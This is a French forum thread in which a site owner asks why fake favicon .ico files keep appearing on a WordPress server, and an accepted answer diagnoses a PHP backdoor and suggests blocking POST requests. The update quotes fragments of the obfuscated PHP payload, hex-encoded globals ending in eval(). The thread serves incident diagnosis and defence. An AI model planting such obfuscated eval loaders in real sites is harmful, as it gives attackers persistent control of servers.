Mystérieux fichiers ico apparaissant sur le serveur Web

Question

Les fichiers apparaissent de manière inattendue sur l'un de mes serveurs Web partagés. Ils peuvent apparaître dans des centaines de répertoires et sont toujours appelés quelque chose comme favicon_1166f9.ico. Les 6 premiers caractères sont toujours favico et l'extension est toujours ico. Bien que ce ne sont pas des icônes et ne peuvent pas être ouverts par une visionneuse d'images.

Il y a cinq jours, j'ai effectué un balayage complet et supprimé des centaines de ces fichiers, mais je viens d'en trouver deux. J'en ai déjà remarqué sur le serveur, mais je pensais qu'il s'agissait simplement d'une corruption liée au téléchargement d'un favicon, mais ce n'est évidemment pas le cas. Le site contient en fait un favicon.ico dans le répertoire principal et fonctionne correctement.

Qu'est-ce qui pourrait faire en sorte que ces fichiers continuent à apparaître? Le site est-il piraté?

UPDATE 1 : commence vraiment à ressembler à un hack. Voici le contenu partiel inséré:

$c6d81c6 = 607;$GLOBALS['g1aff67e']=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['h21842aa7']="\x59\x2f\x6c\x45\x75\x44\x7a\x6f\x68\x2a\x53\x74\x73\x51\x48\x72\x26\x21\x25\x67\x28\x70\x55\x7c\xa\x76\x35\x60\x52\x43\x65\x3d\x4d\x71\x4f\x32\x31\x7e\x34\x20\x5a\x41\x2e\x2c\x3b\x9\x30\x6a\x57\x6e\x3f

Et cela continue pendant 7K se terminant par:

[91].$g1aff67e['h21842aa7'][38].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][57].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][66].$g1aff67e['h21842aa7'][38]]($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db[1]($b7ce1c0db[2]));exit();}}} ?>

Notez que la dernière partie est une eval de ce que le reste est.

UPDATE 2 : Cette question StackOverflow montre une personne ayant le même problème.

La réponse est acceptée mais la solution proposée consiste à désactiver toutes les demandes POST, ce qui ne sera pas possible ici car il s'agit d'un site WordPress et d'autres parties utilisent POST. _ aussi (bien que pas beaucoup mais ils sont nécessaires).

Compte tenu de ces informations, il semble qu’il s’agisse d’une attaque et non de , ce qui explique probablement pourquoi une analyse antivirus n’a rien donné.

La question qui se pose maintenant est la suivante: Comment puis-je empêcher cette attaque de fonctionner? Si c'est ce qui se passe réellement.

Itai · Accepted Answer

Il s'agit d'une attaque ciblant une vulnérabilité PHP avec des requêtes POST.

L’attaquant parvient en quelque sorte à modifier les fichiers PHP existants avec une instruction @include en utilisant un chemin codé qui en traduit un en ces fichiers .ico qui sont des fichiers auto-décryptables PHP appelant un script externe depuis un autre serveur.

Le blocage des demandes POST fonctionne jusqu'à présent. Bien que cela ne soit possible que pour les sites ne dépendant pas de requêtes externes POST. Cela peut être fait dans le fichier .htaccess comme expliqué ici .